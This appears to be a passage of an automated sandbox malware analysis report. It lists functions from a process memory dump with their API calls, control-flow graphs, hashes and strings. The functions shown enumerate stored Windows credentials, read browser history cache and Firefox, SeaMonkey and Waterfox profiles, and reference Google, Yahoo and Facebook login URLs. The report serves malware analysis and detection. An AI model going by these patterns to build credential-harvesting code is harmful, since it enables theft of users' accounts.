                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2941347001-70141382
                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                            Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 645 446747-44674b 643->645 646 446728-44672d 643->646 653 4467ac-4467b7 __setusermatherr 644->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->654 645->642 649 44674d-44674f 645->649 646->642 648 446734-44673b 646->648 648->642 651 44673d-446745 648->651 652 446755-446758 649->652 651->652 652->644 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 662 446834-446838 660->662 663 44683a-44683e 660->663 665 446845-44684b 661->665 666 446872-446877 661->666 662->660 662->663 663->665 667 446840-446842 663->667 669 446853-446864 GetStartupInfoW 665->669 670 44684d-446851 665->670 666->661 667->665 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                            • String ID:
                                                                            • API String ID: 2827331108-0
                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                            • String ID: visited:
                                                                            • API String ID: 1157525455-1702587658
                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E28B
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                            • API String ID: 2804212203-2982631422
                                                                            • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                            • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                            Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040BC75
                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                            • String ID:
                                                                            • API String ID: 115830560-3916222277
                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                            Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                            • free.MSVCRT ref: 0041848B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile$ErrorLastfree
                                                                            • String ID: |A
                                                                            • API String ID: 77810686-1717621600
                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041249C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                            • String ID: r!A
                                                                            • API String ID: 2791114272-628097481
                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                            • API String ID: 2936932814-4196376884
                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                            Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                            • memset.MSVCRT ref: 0040BE91
                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                            • String ID:
                                                                            • API String ID: 697348961-0
                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                            Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403CBF
                                                                            • memset.MSVCRT ref: 00403CD4
                                                                            • memset.MSVCRT ref: 00403CE9
                                                                            • memset.MSVCRT ref: 00403CFE
                                                                            • memset.MSVCRT ref: 00403D13
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403DDA
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                            • API String ID: 3527940856-11920434
                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                            Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403E50
                                                                            • memset.MSVCRT ref: 00403E65
                                                                            • memset.MSVCRT ref: 00403E7A
                                                                            • memset.MSVCRT ref: 00403E8F
                                                                            • memset.MSVCRT ref: 00403EA4
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403F6B
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                            • API String ID: 3527940856-2068335096
                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                            Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403FE1
                                                                            • memset.MSVCRT ref: 00403FF6
                                                                            • memset.MSVCRT ref: 0040400B
                                                                            • memset.MSVCRT ref: 00404020
                                                                            • memset.MSVCRT ref: 00404035
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 004040FC
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                            • API String ID: 3527940856-3369679110
                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                            • API String ID: 3510742995-2641926074
                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 004033B7
                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                            • String ID: $0.@
                                                                            • API String ID: 2758756878-1896041820
                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
